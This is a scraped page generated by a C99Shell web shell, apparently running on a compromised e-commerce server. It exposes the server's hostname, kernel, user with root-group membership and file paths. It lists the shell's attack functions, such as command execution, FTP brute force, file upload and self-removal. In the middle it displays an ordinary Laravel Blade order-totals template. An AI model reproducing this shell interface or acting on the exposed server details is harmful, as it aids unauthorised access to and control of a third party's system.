!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/ecom1.picotech.app/public_html/resources/views/admin/order/tabs/   drwxr-xr-x
Free 29.37 GB of 117.98 GB (24.89%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     total.blade.php (3.74 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<div class="tab-pane" id="tab-totals">
    <div class="pl-lg-4 row">
        <h3>Products</h3>
        <div class="table-responsive">
            <table class="table align-items-center table-bordered" id="product_total_tbl">
                <thead class="thead-dark">
                <tr>
                    <th scope="col" class="sort" data-sort="price">Product</th>
                    <th scope="col" class="sort" data-sort="model">Model</th>
                    <th scope="col" class="sort" data-sort="quantity">Quantity</th>
                    <th scope="col" class="sort" data-sort="unit_price">Unit Price</th>
                    <th scope="col" class="sort" data-sort="product_total">Total</th>
                </tr>
                </thead>
                <tbody class="list">
                <tr class="tr_sub_total">
                    <td colspan="4" class="text-right">Sub-Total</td>
                    <td class="text-right" id="sub_total"></td>
                </tr>

                <tr class="tr_grand_total">
                    <td colspan="4" class="text-right">Total</td>
                    <td class="text-right" id="grand_total"></td>
                </tr>
                </tbody>
            </table>
        </div>
    </div>
    <hr>
    <div class="pl-lg-4 row">

        <div class="col-md-6">
            <div class="form-group">
                <label class="control-label " for="shipping_method">{{ __('Shipping Method') }}</label>
                <select class="form-control" id="shipping_method" name="shipping_method">
                    <option value="">Select </option>
                    @foreach(config('constant.shipping_method') as $key => $value )
                        <option {{ isset($order->shipping_method) && $order->shipping_method == $key ? 'selected' : '' }} value={{ $key }}>{{ $value }}</option>
                    @endforeach
                </select>
            </div>
        </div>

        <div class="col-md-6">
            <div class="form-group">
                <label class="control-label" for="payment_method">{{ __('Payment Method') }}</label>
                <select class="form-control" id="payment_method" name="payment_method">
                    <option value="">Select</option>
                    @foreach(config('constant.payment_method') as $key => $value )
                        <option value={{ $key }} {{ isset($order->payment_method) && $order->payment_method == $key ? 'selected' : '' }} >{{ $value }}</option>
                    @endforeach
                </select>
            </div>
        </div>

        <div class="col-md-6">
            <div class="form-group">
                <label for="coupon_code" class="control-label">Coupon</label>
                <input type="text" name="coupon_code"  id="coupon_code" class="form-control" />
            </div>
        </div>
        <div class="col-md-6">
            <div class="form-group">
                <label class="control-label" for="order_status_id">{{ __('Order Status') }}</label>
                <select class="form-control" id="order_status_id" name="order_status_id">
                    @foreach($data['order_status'] as $key => $value )
                        <option value={{ $key }}  {{ isset($order->order_status_id) && $data['order_status'][$order->order_status_id] == $key ? 'selected' : '' }}>{{ $value }}</option>
                    @endforeach
                </select>
            </div>
        </div>
        <div class="col-md-6">
            <div class="form-group">
                <label for="comment" class="control-label">Comment</label>
                <textarea name="comment" rows="3"  id="comment" class="form-control" >{{ isset($order->order_status_id)  ? $order->comment : '' }}</textarea>
            </div>
        </div>
    </div>
</div>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0033 ]--